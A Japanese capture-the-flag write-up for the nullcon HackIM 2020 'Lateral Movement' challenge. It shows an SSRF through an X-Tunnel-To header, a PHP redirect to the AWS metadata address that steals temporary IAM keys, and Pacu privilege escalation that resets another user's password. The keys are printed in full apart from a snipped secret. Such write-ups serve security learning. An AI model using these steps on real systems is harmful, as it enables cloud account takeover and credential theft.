nullcon HackIM 2020 Writeup - Lateral Movement
Question
Uncover the new path. http://3.12.166.246:3000/ Note: no need to bruteforce tenant. The tenant can be any string.
Solution
Stage1
URLにアクセスすると、リッチなUIだが静的な画面。
script.jsのbuildActionRequest関数を見ると、/api/1/というパスが存在することがわかる。
function buildActionRequest(tenant, tag, typ, action, options) { var path; var request; path = "/api/1/"; if (tenant && tag) path += tenant+tag + "/"; path += typ + "?action\x3d" + action; request = { protocol: this.context.protocol, hostname: this.context.hostname, port: this.context.port, path: path, method: "POST", headers: { "Accept": "application/json", "Content-type": "application/json", } }; if (this.context.authToken) request.headers.Authorization = this.context.authToken; if (this.context.tunnelTo) request.headers["X-Tunnel-To"] = this.context.tunnelTo; if (options) { if (options.headers) Object.keys(options.headers).forEach(function(k) { if (options.headers[k]) request.headers[k] = options.headers[k]; else delete request.headers[k] }); if (options.method) request.method = options.method; if (options.path) request.path = options.path; if (options.data) request.data = options.data } return request }
登場しているHTTPヘッダーをセットして、HTTPリクエストを発行してみる。
root@kali:~# curl -H 'X-Tunnel-To: hoge' -H 'Content-Type: application/json' -H 'Accept: application/json' 'http://3.12.166.246:3000/api/1/aaa?action=bbb' -d '{"ccc":"ddd"}'
{"errno":-3008,"code":"ENOTFOUND","syscall":"getaddrinfo","hostname":"hoge"}
X-Tunnel-Toを変更するとレスポンスに変化が現れた。指定したホスト名にリクエストを転送するようだ。
root@kali:~# curl -H 'X-Tunnel-To: localhost' -H 'Content-Type: application/json' -H 'Accept: application/json' 'http://3.12.166.246:3000/api/1/aaa?action=bbb' -d '{"ccc":"ddd"}'
Not permitted!
root@kali:~# curl -H 'X-Tunnel-To: example.com' -H 'Content-Type: application/json' -H 'Accept: application/json' 'http://3.12.166.246:3000/api/1/aaa?action=bbb' -d '{"ccc":"ddd"}'
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>404 - Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
<script type="text/javascript" src="//wpc.75674.betacdn.net/0075674/www/ec_tpm_bcon.js"></script>
</body>
</html>
Move laterally within the cloud.というヒントが出ており、AWSのインスタンスメタデータが怪しい。
しかし、インスタンスメタデータの接続先である169.254.169.254をX-Tunnel-Toに指定するが、ブロックされる。
root@kali:~# curl -H 'X-Tunnel-To: 169.254.169.254' -H 'Content-Type: application/json' -H 'Accept: application/json' 'http://3.12.166.246:3000/api/1/aaa?action=bbb' -d '{"ccc":"ddd"}'
So smart, But still Internal not permitted!
そこで、リダイレクトで169.254.169.254へアクセスさせる。
まず、自分のサーバに169.254.169.254へ303リダイレクトするページを設置する。(302はNGだった)
root@ip-172-31-26-179:~# cat /var/www/html/api/1/metadata.php <?php header('Location: http://169.254.169.254/'.$_GET["q"], TRUE, 303); ?>
X-Tunnel-Toに自分のサーバのホスト名を指定すると、インスタンスメタデータが返ってきた。
root@ip-172-31-26-179:~# curl -H 'X-Tunnel-To: <attacker-server>' 'http://3.12.166.246:3000/api/1/metadata.php' 1.0 2007-01-19 2007-03-01 2007-08-29 2007-10-10 2007-12-15 2008-02-01 2008-09-01 2009-04-04 2011-01-01 2011-05-01 2012-01-12 2014-02-25 2014-11-05 2015-10-20 2016-04-19 2016-06-30 2016-09-02 2018-03-28 2018-08-17 2018-09-24 latest
EC2インスタンスにアタッチされているIAMロールであるlimited-roleの権限で操作が可能なアクセスキーを取得する。
root@ip-172-31-26-179:~# curl -H 'X-Tunnel-To: <attacker-server>' 'http://3.12.166.246:3000/api/1/metadata.php?q=latest/meta-data/iam/security-credentials/limited-role'
{
"Code" : "Success",
"LastUpdated" : "2020-02-08T14:39:41Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIATCUSO7XXPHMSQ3XC",
"SecretAccessKey" : "YnHSOXfK1L06PVYJ(snip)",
"Token" : "IQoJb3JpZ2luX2VjEC8aCXVzLWVhc3QtMiJHMEUCIQDAF8T+X3zFRfBeNrFz8qeG66VZMerjIO2UrpjZC0c5VwIgdI9iR9VVbT2db7ppnZxj3mE7yBPbvzXqAUCa/v4l/coqvQMI2P//////////ARAAGgwyMTE4MzQzMDYwMzAiDHhVCl2VO7silpXomiqRA4XolMzX5R5MwDD5gg5diaM1jjvsWq+0uJrzpg/l7ULAScCnp18v2I0SdyDb0TmERoGhgP3o2g2gHAtqZgVEDQe//1wG3DBeQ+GLmplMbpgs3+cZcqhKBG5CmMwusCBNTbiJTlkHzYe5bExR24YschWAmVnU+GSoBSvvQiIanJyV8ALDnvjt/5E8y6gnWm/KCCxjTaGwL3JormkaHWxCnEo/ayt+NY6+dZwe4z5+0UnhxokBvyCQDISPRH4zwLJNUiZ/whyTyQIsn1DDFicNQlUngWl3Ek0uvqBp/JtKSVpMRlF5j5jdE3rAnBoqF6nvfUlYl7LRVONfNw0rK6L0NdKSBtrXhBtdJuz5ZWVxBiB4z3V6ieoNzUGti9ivRAGPevsRtWkH3jXItJQEgJ9NbQEJCmj5VrYZs+SFHi347P/xjYHjzHNT/NWjPxMNemSb94JaKqb90hFjqgF9CkFgtq4q7R2pSlKy/H3UXwkE5bYuAI+DjtaTNz6KPSYLY16ReGGknhqy6D3v/quDMHmF/6mkMKmQ+/EFOusBN5piQfRQKrwm862otyDB1HTKTtUdSAj9y/ACwcN6LUAZBQdXwMyL5QWMWk6j30LUl1ODHg1MtpydMNbVdwYM3jSZLSPgmAsD6QW6/jB/ECdAWsnBgNH7VvmccAZtuFFlYFh+zJmaTkYHFMMAkPG17oWDfJO0ofZlFq99DxuJ4OZDnp47zxEEN9C2vLcEBRV6644pbK4qo9e3ZLS1vy0zMJEd6wLcU4G3U3HFz0xfyANMV2d+m0ps+66WJb1nSr/xY8JxFAPrn24ehFdeDbsSJdMEI7mYjssrsinBjPwNCOIGE/TEjMPofVzvpQ==",
"Expiration" : "2020-02-08T20:39:42Z"
}
Stage2
入手したアクセスキーとAWS用の侵入テストツールであるpacuを使用して、情報収集およびラテラルムーブメントを行う。
手順に沿ってインストール後、起動する。
root@kali:~/pacu# python3 pacu.py
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣿⣿⣿⣿⣿⣿⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⡿⠛⠉⠁⠀⠀⠈⠙⠻⣿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣤⣤⣤⣤⣤⣀⣀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣿⡿⣿⣿⣷⣦⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣈⣉⣙⣛⣿⣿⣿⣿⣿⣿⣿⣿⡟⠛⠿⢿⣿⣷⣦⣄⠀⠀⠈⠛⠋⠀⠀⠀⠈⠻⣿⣷⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣈⣉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⣀⣀⣤⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣆⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣬⣭⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⢛⣉⣉⣡⣄⠀⠀⠀⠀⠀⠀⠀⠀⠻⢿⣿⣿⣶⣄⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣁⣤⣶⡿⣿⣿⠉⠻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢻⣿⣧⡀
⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣠⣶⣿⡟⠻⣿⠃⠈⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣧
⢀⣀⣤⣴⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⢠⣾⣿⠉⠻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿
⠉⠛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⡟
⠀⠀⠀⠀⠉⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⡟⠁
⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣄⡀⠀⠀⠀⠀⠀⣴⣆⢀⣴⣆⠀⣼⣆⠀⠀⣶⣶⣶⣶⣶⣶⣶⣶⣾⣿⣿⠿⠋⠀⠀
⠀⠀⠀⣼⣿⣿⣿⠿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠓⠒⠒⠚⠛⠛⠛⠛⠛⠛⠛⠛⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀
⠀⠀⠀⣿⣿⠟⠁⠀⢸⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣷⡄⠀⢀⣾⣿⣿⣿⣿⣿⣿⣷⣆⠀⢰⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠘⠁⠀⠀⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢿⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⣿⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠸⠿⠿⠟⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢀⣀⣀⣀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡏⠉⠉⠉⠉⠀⠀⠀⢸⣿⣿⡏⠉⠉⢹⣿⣿⡇⠀⢸⣿⣿⣇⣀⣀⣸⣿⣿⣿⠀⢸⣿⣿⣿⣀⣀⣀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⡟
⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠘⠛⠛⠃⠀⠀⠉⠛⠛⠛⠛⠛⠛⠋⠀⠀⠀⠀⠙⠛⠛⠛⠛⠛⠉⠀
No database found at /root/pacu/sqlite.db
Database created at /root/pacu/sqlite.db
What would you like to name this new session? hackim
Session hackim created.
Pacu - https://github.com/RhinoSecurityLabs/pacu
Written and researched by Spencer Gietzen of Rhino Security Labs - https://rhinosecuritylabs.com/
This was built as a modular, open source tool to assist in penetration testing an AWS environment.
For usage and developer documentation, please visit the GitHub page.
Modules that have pre-requisites will have those listed in that modules help info, but if it is
executed before its pre-reqs have been filled, it will prompt you to run that module then continue
once that is finished, so you have the necessary data for the module you want to run.
Pacu command info:
list/ls List all modules
load_commands_file <file> Load an existing file with list of commands to execute
search [cat[egory]] <search term> Search the list of available modules by name or category
help Display this page of information
help <module name> Display information about a module
whoami Display information regarding to the active access keys
data Display all data that is stored in this session. Only fields
with values will be displayed
data <service>|proxy Display all data for a specified service or for PacuProxy
in this session
services Display a list of services that have collected data in the
current session to use with the "data" command
regions Display a list of all valid AWS regions
update_regions Run a script to update the regions database to the newest
version
set_regions <region> [<region>...] Set the default regions for this session. These space-separated
regions will be used for modules where regions are required,
but not supplied by the user. The default set of regions is
every supported region for the service. Supply "all" to this
command to reset the region set to the default of all
supported regions
run/exec <module name> Execute a module
set_keys Add a set of AWS keys to the session and set them as the
default
swap_keys Change the currently active AWS key to another key that has
previously been set for this session
import_keys <profile name>|--all Import AWS keys from the AWS CLI credentials file (located
at ~/.aws/credentials) to the current sessions database.
Enter the name of a profile you would like to import or
supply --all to import all the credentials in the file.
exit/quit Exit Pacu
Other command info:
aws <command> Run an AWS CLI command directly. Note: If Pacu detects "aws"
as the first word of the command, the whole command will
instead be run in a shell so that you can use the AWS CLI
from within Pacu. Due to the command running in a shell,
this enables you to pipe output where needed. An example
would be to run an AWS CLI command and pipe it into "jq"
to parse the data returned. Warning: The AWS CLI's
authentication is not related to Pacu. Be careful to
ensure that you are using the keys you want when using
the AWS CLI. It is suggested to use AWS CLI profiles
to solve this problem
[ADVANCED] PacuProxy command info:
proxy [help] Control PacuProxy/display help
start <ip> [port] Start the PacuProxy listener - port 80 by default.
The listener will attempt to start on the IP
supplied, but some hosts don't allow this. In
this case, PacuProxy will listen on 0.0.0.0 and
use the supplied IP to stage agents and it should
work the same
stop Stop the PacuProxy listener
kill <agent_id> Kill an agent (stop it from running on the host)
list/ls List info on remote agent(s)
use none|<agent_id> Use a remote agent, identified by unique integers
(use "proxy list" to see them). Choose "none" to
no longer use any proxy (route from the local
host instead)
shell <agent_id> <command> Run a shell command on the remote agent
fetch_ec2_keys <agent_id> Try to read the meta-data of the target agent to
request a set of temporary credentials for the
attached instance profile (if there is one),
then save them to the Pacu database and set
them as the active key pair
stager sh|ps Generate a PacuProxy stager. The "sh" format is
for *sh shells in Unix (like bash), and the "ps"
format is for PowerShell on Windows
Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...
User agent for this session set to:
aws-cli/1.15.10 Python/2.7.9 Windows/8 botocore/1.10.10
インスタンスメタデータから入手したクレデンシャル情報をセットする。
Pacu (hackim:No Keys Set) > set_keys Setting AWS Keys... Press enter to keep the value currently stored. Enter the letter C to clear the value, rather than set it. If you enter an existing key_alias, that key's fields will be updated instead of added. Key alias [None]: limited-role Access key ID [None]: ASIATCUSO7XXPHMSQ3XC Secret access key [None]: YnHSOXfK1L06PVYJ(snip) Session token (Optional - for temp AWS keys only) [None]: IQoJb3JpZ2luX2VjEC8aCXVzLWVhc3QtMiJHMEUCIQDAF8T+X3zFRfBeNrFz8qeG66VZMerjIO2UrpjZC0c5VwIgdI9iR9VVbT2db7ppnZxj3mE7yBPbvzXqAUCa/v4l/coqvQMI2P//////////ARAAGgwyMTE4MzQzMDYwMzAiDHhVCl2VO7silpXomiqRA4XolMzX5R5MwDD5gg5diaM1jjvsWq+0uJrzpg/l7ULAScCnp18v2I0SdyDb0TmERoGhgP3o2g2gHAtqZgVEDQe//1wG3DBeQ+GLmplMbpgs3+cZcqhKBG5CmMwusCBNTbiJTlkHzYe5bExR24YschWAmVnU+GSoBSvvQiIanJyV8ALDnvjt/5E8y6gnWm/KCCxjTaGwL3JormkaHWxCnEo/ayt+NY6+dZwe4z5+0UnhxokBvyCQDISPRH4zwLJNUiZ/whyTyQIsn1DDFicNQlUngWl3Ek0uvqBp/JtKSVpMRlF5j5jdE3rAnBoqF6nvfUlYl7LRVONfNw0rK6L0NdKSBtrXhBtdJuz5ZWVxBiB4z3V6ieoNzUGti9ivRAGPevsRtWkH3jXItJQEgJ9NbQEJCmj5VrYZs+SFHi347P/xjYHjzHNT/NWjPxMNemSb94JaKqb90hFjqgF9CkFgtq4q7R2pSlKy/H3UXwkE5bYuAI+DjtaTNz6KPSYLY16ReGGknhqy6D3v/quDMHmF/6mkMKmQ+/EFOusBN5piQfRQKrwm862otyDB1HTKTtUdSAj9y/ACwcN6LUAZBQdXwMyL5QWMWk6j30LUl1ODHg1MtpydMNbVdwYM3jSZLSPgmAsD6QW6/jB/ECdAWsnBgNH7VvmccAZtuFFlYFh+zJmaTkYHFMMAkPG17oWDfJO0ofZlFq99DxuJ4OZDnp47zxEEN9C2vLcEBRV6644pbK4qo9e3ZLS1vy0zMJEd6wLcU4G3U3HFz0xfyANMV2d+m0ps+66WJb1nSr/xY8JxFAPrn24ehFdeDbsSJdMEI7mYjssrsinBjPwNCOIGE/TEjMPofVzvpQ== Keys saved to database.
iam__enum_users_roles_policies_groupsで、IAM関連の情報を取得する。
Pacu (hackim:limited-role) > run iam__enum_users_roles_policies_groups Running module iam__enum_users_roles_policies_groups... [iam__enum_users_roles_policies_groups] Found 1 users [iam__enum_users_roles_policies_groups] Found 3 roles [iam__enum_users_roles_policies_groups] Found 3 policies [iam__enum_users_roles_policies_groups] Found 3 groups [iam__enum_users_roles_policies_groups] iam__enum_users_roles_policies_groups completed. [iam__enum_users_roles_policies_groups] MODULE SUMMARY: 1 Users Enumerated 3 Roles Enumerated 3 Policies Enumerated 3 Groups Enumerated IAM resources saved in Pacu database.
取得したIAMの情報を表示する。
Pacu (hackim:limited-role) > data
Session data:
aws_keys: [
<AWSKey: limited-role>
]
id: 1
created: "2020-02-08 15:10:24.095578"
is_active: true
name: "hackim"
boto_user_agent: "aws-cli/1.15.10 Python/2.7.9 Windows/8 botocore/1.10.10"
key_alias: "limited-role"
access_key_id: "ASIATCUSO7XXPHMSQ3XC"
secret_access_key: "******" (Censored)
session_token: "IQoJb3JpZ2luX2VjEC8aCXVzLWVhc3QtMiJHMEUCIQDAF8T+X3zFRfBeNrFz8qeG66VZMerjIO2UrpjZC0c5VwIgdI9iR9VVbT2db7ppnZxj3mE7yBPbvzXqAUCa/v4l/coqvQMI2P//////////ARAAGgwyMTE4MzQzMDYwMzAiDHhVCl2VO7silpXomiqRA4XolMzX5R5MwDD5gg5diaM1jjvsWq+0uJrzpg/l7ULAScCnp18v2I0SdyDb0TmERoGhgP3o2g2gHAtqZgVEDQe//1wG3DBeQ+GLmplMbpgs3+cZcqhKBG5CmMwusCBNTbiJTlkHzYe5bExR24YschWAmVnU+GSoBSvvQiIanJyV8ALDnvjt/5E8y6gnWm/KCCxjTaGwL3JormkaHWxCnEo/ayt+NY6+dZwe4z5+0UnhxokBvyCQDISPRH4zwLJNUiZ/whyTyQIsn1DDFicNQlUngWl3Ek0uvqBp/JtKSVpMRlF5j5jdE3rAnBoqF6nvfUlYl7LRVONfNw0rK6L0NdKSBtrXhBtdJuz5ZWVxBiB4z3V6ieoNzUGti9ivRAGPevsRtWkH3jXItJQEgJ9NbQEJCmj5VrYZs+SFHi347P/xjYHjzHNT/NWjPxMNemSb94JaKqb90hFjqgF9CkFgtq4q7R2pSlKy/H3UXwkE5bYuAI+DjtaTNz6KPSYLY16ReGGknhqy6D3v/quDMHmF/6mkMKmQ+/EFOusBN5piQfRQKrwm862otyDB1HTKTtUdSAj9y/ACwcN6LUAZBQdXwMyL5QWMWk6j30LUl1ODHg1MtpydMNbVdwYM3jSZLSPgmAsD6QW6/jB/ECdAWsnBgNH7VvmccAZtuFFlYFh+zJmaTkYHFMMAkPG17oWDfJO0ofZlFq99DxuJ4OZDnp47zxEEN9C2vLcEBRV6644pbK4qo9e3ZLS1vy0zMJEd6wLcU4G3U3HFz0xfyANMV2d+m0ps+66WJb1nSr/xY8JxFAPrn24ehFdeDbsSJdMEI7mYjssrsinBjPwNCOIGE/TEjMPofVzvpQ=="
session_regions: [
"all"
]
IAM: {
"Users": [
{
"Path": "/",
"UserName": "poorUser",
"UserId": "AIDATCUSO7XXPAUMHXSZ2",
"Arn": "arn:aws:iam::211834306030:user/poorUser",
"CreateDate": "Thu, 23 Jan 2020 15:42:45",
"PasswordLastUsed": "Sat, 08 Feb 2020 14:12:41"
}
],
"Roles": [
{
"Path": "/aws-service-role/support.amazonaws.com/",
"RoleName": "AWSServiceRoleForSupport",
"RoleId": "AROATCUSO7XXKU7K6BBJM",
"Arn": "arn:aws:iam::211834306030:role/aws-service-role/support.amazonaws.com/AWSServiceRoleForSupport",
"CreateDate": "Thu, 23 Jan 2020 11:20:05",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "support.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Enables resource access for AWS to provide billing, administrative and support services",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/trustedadvisor.amazonaws.com/",
"RoleName": "AWSServiceRoleForTrustedAdvisor",
"RoleId": "AROATCUSO7XXCDG4HOBDW",
"Arn": "arn:aws:iam::211834306030:role/aws-service-role/trustedadvisor.amazonaws.com/AWSServiceRoleForTrustedAdvisor",
"CreateDate": "Thu, 23 Jan 2020 11:20:05",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "trustedadvisor.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Access for the AWS Trusted Advisor Service to help reduce cost, increase performance, and improve security of your AWS environment.",
"MaxSessionDuration": 3600
},
{
"Path": "/",
"RoleName": "limited-role",
"RoleId": "AROATCUSO7XXK6KY3Y54E",
"Arn": "arn:aws:iam::211834306030:role/limited-role",
"CreateDate": "Thu, 23 Jan 2020 16:16:29",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Allows EC2 instances to call AWS services on your behalf.",
"MaxSessionDuration": 3600
}
],
"Policies": [
{
"PolicyName": "limited-role-2",
"PolicyId": "ANPATCUSO7XXEQI2GQ6A6",
"Arn": "arn:aws:iam::211834306030:policy/limited-role-2",
"Path": "/",
"DefaultVersionId": "v11",
"AttachmentCount": 2,
"IsAttachable": true,
"CreateDate": "Sat, 08 Feb 2020 07:15:23",
"UpdateDate": "Sat, 08 Feb 2020 07:50:32"
},
{
"PolicyName": "limiteds3",
"PolicyId": "ANPATCUSO7XXJVJ3W23VX",
"Arn": "arn:aws:iam::211834306030:policy/limiteds3",
"Path": "/",
"DefaultVersionId": "v1",
"IsAttachable": true,
"CreateDate": "Thu, 23 Jan 2020 21:20:26",
"UpdateDate": "Thu, 23 Jan 2020 21:20:26"
},
{
"PolicyName": "limited",
"PolicyId": "ANPATCUSO7XXKNAARZWEA",
"Arn": "arn:aws:iam::211834306030:policy/limited",
"Path": "/",
"DefaultVersionId": "v12",
"AttachmentCount": 1,
"IsAttachable": true,
"CreateDate": "Thu, 23 Jan 2020 15:40:20",
"UpdateDate": "Sat, 08 Feb 2020 07:11:05"
}
],
"Groups": [
{
"Path": "/",
"GroupName": "limited2",
"GroupId": "AGPATCUSO7XXM4A7JKWKI",
"Arn": "arn:aws:iam::211834306030:group/limited2",
"CreateDate": "Sat, 08 Feb 2020 07:16:17"
},
{
"Path": "/",
"GroupName": "limiteds3g",
"GroupId": "AGPATCUSO7XXCJPDNISWZ",
"Arn": "arn:aws:iam::211834306030:group/limiteds3g",
"CreateDate": "Thu, 23 Jan 2020 21:21:19"
},
{
"Path": "/",
"GroupName": "priv",
"GroupId": "AGPATCUSO7XXIZJZ6F56S",
"Arn": "arn:aws:iam::211834306030:group/priv",
"CreateDate": "Thu, 23 Jan 2020 15:40:53"
}
]
}
Proxy data:
{
"IP": "0.0.0.0",
"Port": 80,
"Listening": false,
"SSHUsername": "",
"SSHPassword": "",
"TargetAgent": []
}
AWSアカウントIDは211834306030であることと、poorUserというIAMユーザーがいることがわかる。
iam__privesc_scanで、他ユーザへの権限昇格を試すと、limited-roleロールにUpdateLoginProfileポリシーがアタッチされていることがわかる。UpdateLoginProfileポリシーを持っていれば、他のIAMユーザのパスワードを変更できるようだ。poorUserのパスワードを変更する。
Pacu (hackim:limited-role) > run iam__privesc_scan
Running module iam__privesc_scan...
[iam__privesc_scan] No permissions detected yet.
[iam__privesc_scan] Data (Current User/Role > Permissions) not found, run module "iam__enum_permissions" to fetch it? (y/n) y
[iam__privesc_scan] Running module iam__enum_permissions...
[iam__enum_permissions] Confirming permissions for roles:
[iam__enum_permissions] limited-role...
[iam__enum_permissions] Confirmed permissions for limited-role
[iam__enum_permissions] iam__enum_permissions completed.
[iam__enum_permissions] MODULE SUMMARY:
Confirmed permissions for 0 user(s).
Confirmed permissions for role: limited-role.
[iam__privesc_scan] Escalation methods for current role:
[iam__privesc_scan] CONFIRMED: UpdateLoginProfile
[iam__privesc_scan] Attempting confirmed privilege escalation methods...
[iam__privesc_scan] Starting method UpdateLoginProfile...
[iam__privesc_scan] Is there a specific user you want to target? They must already have a login profile (password for logging into the AWS Console). Enter their user name now or just hit enter to enumerate users and view a list of options:
[iam__privesc_scan] Found 1 user(s). Choose a user below.
[iam__privesc_scan] [0] Other (Manually enter user name)
[iam__privesc_scan] [1] All Users
[iam__privesc_scan] [2] poorUser
[iam__privesc_scan] Choose an option: 2
[iam__privesc_scan] Running module iam__backdoor_users_password...
[iam__backdoor_users_password] Modifying an IAM user's current password
[iam__backdoor_users_password] User: poorUser
[iam__backdoor_users_password] Password successfully changed
[iam__backdoor_users_password] Password: hqw.yE.a##CfW$V3q"npK_"k"/=&d*4UV0MSItR{(ueW}Gd0[(snip)
[iam__backdoor_users_password] iam__backdoor_users_password completed.
[iam__backdoor_users_password] MODULE SUMMARY:
1 user(s) backdoored.
[iam__privesc_scan] iam__privesc_scan completed.
[iam__privesc_scan] MODULE SUMMARY:
Privilege escalation was successful
変更したパスワードで、AWSの管理コンソールにログインする。
poorUserの権限を確認するため、まずはpoorUserが所属しているIAMグループを確認する。
limiteds3gとlimited2グループに所属している。それぞれにアタッチされているポリシーを確認する。
limiteds3gグループにはAmazonS3ReadOnlyAccessがアタッチされている。
limited2グループには以下の画像のActionが可能なポリシーがアタッチされている。
S3が読めるようなので、S3の画面に遷移すると、怪しいS3バケットを発見する。
flag.txtを発見!
ダウンロードすると、フラグが書かれていた。
フラグゲット。
hackim20{Hail_RhinoSecurity_labs!!!!}
